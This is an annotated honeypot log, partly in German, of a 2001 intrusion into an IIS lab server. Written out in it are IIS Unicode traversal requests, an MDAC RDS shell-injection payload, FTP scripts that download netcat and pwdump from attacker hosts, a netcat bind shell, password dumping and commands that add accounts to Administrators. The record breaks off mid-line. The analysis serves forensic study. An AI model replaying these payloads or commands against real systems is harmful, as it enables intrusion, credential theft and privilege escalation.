Attacker: 213.116.251.162 TTL 111 (17 hops away) Honeypot: 172.16.1.106 TTL 127 (1 hop away) Time-Offset +5h 2001/02/04 13:25:09.372695 tcpdump zeigt 14:25:09.... Was denn nun???? Zugriff via Browser auf DocumentRoot http://lab.wiretrip.net/ 2001/02/04 13:25:14.550077 5 Sekunden später Zugriff via Browser auf /guest/default.asp Gästebuch? Referer ist wie erwartet gesetzt: http://lab.wiretrip.net/ Grafiken werden geladen... Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD 2001/02/04 13:25:22.525676 wiederum 8 Sekunden später GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini -> IIS Unicode Directory Traversal Vulnerability (bugtraq id 1806) No referer Cookie matches sends also the following requests: 14:25:22.525676 same src port (1765), bad tcp checksum! same sequence number, ACKs the same packet (2093) 25 4330 2541 46 (%C0%AF) becomes c0 af2e 2e2f 2e so it step by step replaces the quoted sequence %C0%AF with its binary equivalent GET /guest/default.asp/....../.../..%C0%AF../..%C0%AF../boot.ini GET /guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini GET /guest/default.asp/....../....../....../boot.ini Server is vulnerable and returns the requested file [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00" multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo /sos The attacker gains information about the disk layout. The directory holding Windows is named C:\WINNT 2001/02/04 13:26:35.916198 1 min 12s later probe for MS Data Access Component virtual directory: GET /msadc/ presents the cookie Server responds with 403 forbidden. So, the directory is there (otherwise it should have issued a 404) 2001/02/04 13:26:49.229673 14 s later GET /msadc/msadcs.dll HTTP/1.0 no cookie in request header Server responds with 200 Ok and Content-Type: application/x-varg It appears to be vulnerable! 2001/02/04 13:27:08.159193 19 s later POST /msadc/msadcs.dll/AdvancedDataFactory.Query -> MDAC RDS Vulnerability (bugtraq id 529) in Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|'...driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; boundary=!ADM!ROX!YOUR!WORLD! Server responds with 100 Continue. Attempts to create the file C:\fun, containing the string "werd" 2001/02/04 13:27:15.708044 7 s later GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun retrieve "fun". Server responds with 200 Ok and the string "werd". So the exploit was successful. followed by two "hand crafted" packets, again with bad tcp checksum GET /guest/default.asp/....../....../..%AF../..%C0%AF../fun GET /guest/default.asp/....../....../....../fun 2001/02/04 13:32:51.574859 wieder ein shellaufruf: ... shell("cmd /c echo user johna2k > ftpcom") uses vulnerability in MS Access ODBC Driver. Uses c:\winnt\help\iis\htm\tutorial\btcustmr.mdb as helper. builds a ftp command script, named "ftpcom": user johna2k hacker2000 get samdump.dll get pdump.exe get nc.exe quit now follows the command: cmd /c ftp -s:ftpcom -n www.nether.net (-s: name of the script to execute -n: suppresses automatic prompt for username and password) www.nether.net denies login with 530 Login incorrect. Account canceld? (freenet.nether.net) subsequent scripted commands are failing, server responds with 530 Please login with USER and PASS pdump.exe >> new.pass cant't work, because the file hasn't been transfered. The attacker tries to upload "new.pass" Builds a new ftp command script, named ftpcom2: user johna2k hacker2000 put new.pass quit >>> upload retrieved passwords ftp -s:ftpcom2 -n www.nether.net login fails again. 13:34:31.242151 browser active, grabs a few images. The hacker recognizes, his account on nether.net has been disabled. By accident the hacker immediately starts a ftp session: cmd /c ftp 213.116.251.162 ftp session hangs, because the shell isn't interactive. 2001/02/04 13:34:47.612437 creates a new ftp command script, named "ftpcom" again (overwrites the old one) open 213.116.251.162 johna2k hacker2000 get samdump.dll get pdump.exe get nc.exe quit attempts to ftp to his computer: ftp -s:ftpcom (213.116.251.162 resolves to 1Cust162.tnt13.stk3.da.uu.net) 2001/02/04 13:38:27.521384 open 212.139.12.26 (forgot to redirect to sasfile?) 212.139.12.26 resolves to freedu-12-26.libertysurf.se creates another ftp command script, named sasfile (typo?) johna2k haxedj00 get pdump.exe get samdump.dll get nc.exe quit ftp -s:sasfile doesn't work? try your own machine... 2001/02/04 13:40:11.229519 open 213.116.251.162 (forgot the redirection again, further commands will be appended to sasfile) johna2k haxedj00 get pdump.exe get samdump.dll get nc.exe quit ftp -s:sasfile 2001/02/04 13:41:03.136533 and now for something completely different, Unicode Directory Traversal Vulnerability GET /msadc/....../.../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe >>> copy the command interpreter as "cmd1.exe" into current directory GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom >>> tries again to create a ftp command script (named ftpcom), now using proper redirection: --- begin - ftpcom --- open 213.116.251.162 johna2k haxedj00 get nc.exe get pdump.exe get samdump.dll quit --- end -- ftpcom ---- ftp -s:ftpcom ftp login successful, files are transferred usind ASCII-Mode!!! Argh!!! nc.exe 59392 bytes, looks like netcat, based on filesize and embedded strings pdump.exe 32768 bytes contains strings LSASS.EXE Pwdump2 dump the sam database Usage: %s needs samdump.dll creates or attaches to a named pipe \\pipe\\pwdump2 samdump.dll 36864 bytes 13:42:55.244260 transfer completed 2001/02/04 13:42:42.787971 while transfer is still in progress, blackhat runs netcat, connecting port 6969 to the command interpreter nc -l -p 6969 -e cmd1.exe (Unicode vuln.) 13:42:49.195696 attacker connects to rootshell on port 6969 cmd prompt appears, current working directory is C:\Program files\Common files\system\msadc 13:43:31.075053 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\system\msadc 02/04/01 06:41a . 02/04/01 06:41a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 02/04/01 06:41a 98 ftpcom 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 02/04/01 06:41a 32,768 pdump.exe 10/02/97 07:28a 19,388 readme.txt 02/04/01 06:41a 36,864 samdump.dll 16 File(s) 698,383 bytes 1,690,861,056 bytes free C:\Program Files\Common Files\system\msadc> C:\Program Files\Common Files\system\msadc> 13:43:52.580779 Using RDS vuln: C:\Program Files\Common Files\system\msadc\pdump.exe >> yay.txt attacker typed "dir" again: Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\system\msadc 02/04/01 06:41a . 02/04/01 06:41a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 02/04/01 06:41a 98 ftpcom 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 02/04/01 06:41a 32,768 pdump.exe 10/02/97 07:28a 19,388 readme.txt 02/04/01 06:41a 36,864 samdump.dll 16 File(s) 698,383 bytes 1,690,861,056 bytes free C:\Program Files\Common Files\system\msadc> C:\Program Files\Common Files\system\msadc> file "yay.txt" ist not there tries again, hits by accident ESC-A [Adir The name specified is not recognized as an internal or external command, operable program or batch file. C:\Program Files\Common Files\system\msadc> 13:44:05.245136 dir again. yay.txt still not there 13:44:10 del ftpcom 13:44:13 ls The name specified is not recognized as an internal or external command, operable program or batch file. 13:44:14 dir again Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\system\msadc 02/04/01 06:43a . 02/04/01 06:43a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 02/04/01 06:41a 32,768 pdump.exe 10/02/97 07:28a 19,388 readme.txt 02/04/01 06:41a 36,864 samdump.dll 15 File(s) 698,285 bytes 1,690,861,056 bytes free C:\Program Files\Common Files\system\msadc> 13:44:20 type readme.e The system cannot find the file specified. 13:44:36 using RDS: C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt 13:44:42 tries to change the volume, but fails: The filename, directory name, or volume label syntax is incorrect. 13:44:44 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 06:26a 7 fun 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:42a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 14 File(s) 78,643,529 bytes 1,690,861,056 bytes free C:\> 13:44:51 rm The name specified is not recognized as an internal or external command, operable program or batch file. 13:44:54 del fun 13:44:55 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini (/P@ 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:42a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\> 13:45:00 cd exploites The system cannot find the path specified. 13:45:01 dir again 13:45:03 cd exploits C:\exploits> 13:45:04 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits (/a@ 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,861,056 bytes free C:\exploits> 13:45:10 cd microsoft C:\exploits\microsoft> 13:45:10 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\microsoft 12/26/00 07:36p . 12/26/00 07:36p .. 11/05/97 09:46a 87,312 95sscrk.zip 08/15/00 02:06p 734 ac.zip 08/12/98 09:46a 9,417 anger.tar.gz 5 File(s) 97,463 bytes 1,690,861,056 bytes free C:\exploits\microsoft> 13:45:22 cd .. C:\exploits> 13:45:25 cd newfiles C:\exploits\newfiles> 13:45:26 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\newfiles 12/26/00 07:35p . 12/26/00 07:35p .. 2 File(s) 0 bytes 1,690,861,056 bytes free C:\exploits\newfiles> 13:45:29 cd .. C:\exploits> 13:45:30 cd unix C:\exploits\unix> 13:45:31 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,861,056 bytes free C:\exploits\unix> 13:45:37 cd .. C:\exploits> 13:45:37 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 :}N 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,861,056 bytes free C:\exploits> 13:45:40 cd .. C:\> 13:45:40 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:42a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\> 14:45:55 RDS pdump.exe >> c:\yay.txt 13:45:58 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:44a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\> 13:46:01 dir' The name specified is not recognized as an internal or external command, operable program or batch file. C:\> 13:46:06 cat yay.txt The name specified is not recognized as an internal or external command, operable program or batch file. 13:46:08 type yay The system cannot find the file specified. 13:46:11 type yay.txt 13:46:20 net session System error 5 has occurred. Access is denied. 13:46:24 net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. 13:47:37 RDS net session >> yay2.txt 13:47:55 RDS net session >> c:\yay2.txt 13:48:53 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:46a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 02/04/01 06:46a 38 yay2.txt 14 File(s) 78,643,560 bytes 1,690,861,056 bytes free C:\> 13:48:59 type yay2.txt There are no entries in the list. 13:49:07 del yay2.txt 13:49:14 net session >>yay3.txt System error 5 has occurred. Access is denied. C:\> 13:49:14 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:46a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 02/04/01 06:48a 0 yay3.txt 14 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\> 13:49:21 del yay& Could Not Find C:\yay The name specified is not recognized as an internal or external command, operable program or batch file. C:\> 13:49:22 dir again 13:49:28 del yay* C:\yay.txt The process cannot access the file because it is being used by another process. C:\> >>> pdump.exe is still running and accesses yay.txt 13:49:37 del yay3.txt Could Not Find C:\yay3.txt C:\> 13:49:38 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini (14@ 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:46a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\> 13:59:54 RDS net users >>heh.txt 13:50:00 RDS net users >>c:\heh.txt 13:50:03 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 06:48a 263 heh.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:48a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 14 File(s) 78,643,785 bytes 1,690,861,056 bytes free C:\> 13:50:08 yuper The name specified is not recognized as an internal or external command, operable program or batch file. 13:50:10 type heh.txt User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY WAM_KENNY The command completed with one or more errors. C:\> 13:50:15 del heh.txt C:\> 13:50:20 cd program files C:\Program Files> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,861,056 bytes free C:\Program Files> 13:50:26 cd .. C:\> 13:50:26 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:48a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\> 13:50:28 echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r C:\> 13:50:54 Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 06:48a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 14 File(s) 78,643,591 bytes 1,690,861,056 bytes free C:\> 13:51:06 dir again 13:51:31 net group Group Accounts for \\ ------------------------------------------------------------------------------- *Domain Admins *Domain Guests *Domain Users The command completed with one or more errors. C:\> 13:51:35 net localgroup System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\> 13:51:42 net group domain admins The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\> 13:51:54 [Anet group /? The name specified is not recognized as an internal or external command, operable program or batch file. C:\> 13:52:00 net group ?? The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\> 13:52:03 net group /? The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\> 13:52:09 net group Group Accounts for \\ ------------------------------------------------------------------------------- *Domain Admins *Domain Guests *Domain Users The command completed with one or more errors. C:\> 13:52:32 net localgroup System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\> 13:52:48 net localgroup /domain admins System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\> 13:53:06 net localgroup domain admins The syntax of this command is: NET LOCALGROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname name [...] {/ADD | /DELETE} [/DOMAIN] C:\> 13:53:27 net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. C:\> 13:53:39 RDS net localgroup Domain Admins IWAM_KENNY /ADD 13:54:03 RDS net localgroup Domain Admins IUSR_KENNY /ADD 13:54:10 net session System error 5 has occurred. Access is denied. C:\> 13:54:20 RDS aborted?! 13:54:25 [Anet localgroup domain admins The name specified is not recognized as an internal or external command, operable program or batch file. C:\> 13:54:43 net group domain admins The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\> 13:55:45 net localgroup administrators Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins The command completed successfully. C:\> 13:56:05 RDS net localgroup administrators IUSR_KENNY /ADD 13:56:09 RDS net localgroup administrators IWAM_KENNY /ADD 13:56:24 [Anet localgroup administrators The name specified is not recognized as an internal or external command, operable program or batch file. C:\> 13:56:34 net localgroup administrators Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins IUSR_KENNY IWAM_KENNY The command completed successfully. C:\> 13:56:38 net session System error 5 has occurred. Access is denied. C:\> 13:56:42 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 06:55a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 14 File(s) 78,643,591 bytes 1,690,852,864 bytes free C:\> 13:56:53 cd program files C:\Program Files> 13:56:54 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/0:}Q 7/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,852,864 bytes free C:\Program Files> 13:56:56 cd common files C:\Program Files\Common Files> 13:56:57 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files 12/07/00 03:11p . 12/07/00 03:11p .. 12/07/00 03:23p Microsoft Shared 12/07/00 03:35p ODBC 12/07/00 03:23p Services 12/07/00 03:23p System 6 File(s) 0 bytes 1,690,852,864 bytes free C:\Program Files\Common Files> 13:57:03 cd obdc The system cannot find the path specified. C:\Program Files\Common Files> 13:57:04 dir again 13:57:13 cd microsoft shadr The filename, directory name, or volume label syntax is incorrect. C:\Program Files\Common Files> 13:57:18 cd microsoft shared C:\Program Files\Common Files\Microsoft Shared> 13:57:19 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\Microsoft Shared 12/07/00 03:23p . 12/07/00 03:23p .. 12/07/00 03:23p Stationery 12/07/00 03:09p TextConv 4 File(s) 0 bytes 1,690,852,864 bytes free C:\Program Files\Common Files\Microsoft Shared> 13:57:22 cd .. C:\Program Files\Common Files> 13:57:25 cd odbc C:\Program Files\Common Files\ODBC> 13:57:25 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\ODBC 12/07/00 03:35p . 12/07/00 03:35p .. 12/07/00 03:35p Data Sources 3 File(s) 0 bytes 1,690,852,864 bytes free C:\Program Files\Common Files\ODBC> 13:57:13 cd data dou The system cannot find the path specified. C:\Program Files\Common Files\ODBC> 13:57:33 cd data sources C:\Program Files\Common Files\ODBC\Data Sources> 13:57:34 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\ODBC\Data Sources 12/07/00 03:35p . 12/07/00 03:35p .. 2 File(s) 0 bytes 1,690,852,864 bytes free C:\Program Files\Common Files\ODBC\Data Sources> 13:57:38 cd .. C:\Program Files\Common Files> 13:57:50 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files 12/07/00 03:11p . 12/07/00 03:11p .. 12/07/00 03:23p Microsoft Shared 12/07/00 03:35p ODBC 12/07/00 03:23p Services 12/07/00 03:23p System 6 File(s) 0 bytes 1,690,852,864 bytes free C:\Program Files\Common Files> 13:57:52 cd system C:\Program Files\Common Files\System> 13:57:53 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\System 12/07/00 03:23p . 12/07/00 03:23p .. 12/07/00 03:34p ado 02/04/01 06:43a msadc 12/07/00 03:34p ole db 11/11/97 12:50p 399,120 wab32.dll 6 File(s) 399,120 bytes 1,690,852,864 bytes free C:\Program Files\Common Files\System> 13:57:55 cd msads The system cannot find the path specified. C:\Program Files\Common Files\System> 13:57:56 dir again 13:58:00 cd msas The filename, directory name, or volume label syntax is incorrect. C:\Program Files\Common Files\System> 13:58:02 cd msadc C:\Program Files\Common Files\System\msadc> Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\System\msadc 02/04/01 06:43a . 02/04/01 06:43a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 02/04/01 06:41a 32,768 pdump.exe 10/02/97 07:28a 19,388 readme.txt 02/04/01 06:41a 36,864 samdump.dll 15 File(s) 698,285 bytes 1,690,852,864 bytes free C:\Program Files\Common Files\System\msadc> 13:58:06 psu The name specified is not recognized as an internal or external command, operable program or batch file. C:\Program Files\Common Files\System\msadc> 13:58:08 pdump Failed to open lsass: 5. Exiting. C:\Program Files\Common Files\System\msadc> 13:58:33 net start These Windows NT services are started: Alerter Computer Browser EventLog FTP Publishing Service IIS Admin Service License Logging Service Messenger MSDTC Net Logon NT LM Security Support Provider Plug and Play Protected Storage Remote Procedure Call (RPC) Locator Remote Procedure Call (RPC) Service Server Spooler TCP/IP NetBIOS Helper Workstation World Wide Web Publishing Service The command completed successfully. C:\Program Files\Common Files\System\msadc> 13:58:59 RDS net user testuser UgotHacked /ADD 13:59:18 RDS net localgroup Administrators testuser /ADD 13:59:20 netbios-ssn and ICMP ping from attacker. Attacker attempts to establish a session using the new account. 13:59:54 net localgroup administrators Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins IUSR_KENNY IWAM_KENNY The command completed successfully. C:\Program Files\Common Files\System\msadc> 14:00:15 net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. C:\Program Files\Common Files\System\msadc> 14:00:24 net users /? The syntax of this command is: NET USER [username [password | *] [options]] [/DOMAIN] username {password | *} /ADD [options] [/DOMAIN] username [/DELETE] [/DOMAIN] C:\Program Files\Common Files\System\msadc> 14:00:36 net users hi guy /ADD System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\Program Files\Common Files\System\msadc> 14:01:11 net user User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. C:\Program Files\Common Files\System\msadc> 14:01:15 net user /? The syntax of this command is: NET USER [username [password | *] [options]] [/DOMAIN] username {password | *} /ADD [options] [/DOMAIN] username [/DELETE] [/DOMAIN] C:\Program Files\Common Files\System\msadc> 14:01:36 net user himan HarHar666 /ADD System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\Program Files\Common Files\System\msadc> 14:02:55 net name Name ------------------------------------------------------------------------------- LAB ADMINISTRATOR The command completed successfully. C:\Program Files\Common Files\System\msadc> 14:03:15 net user User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. C:\Program Files\Common Files\System\msadc> 14:03:21 net user Administrator System error 1312 has occurred. A 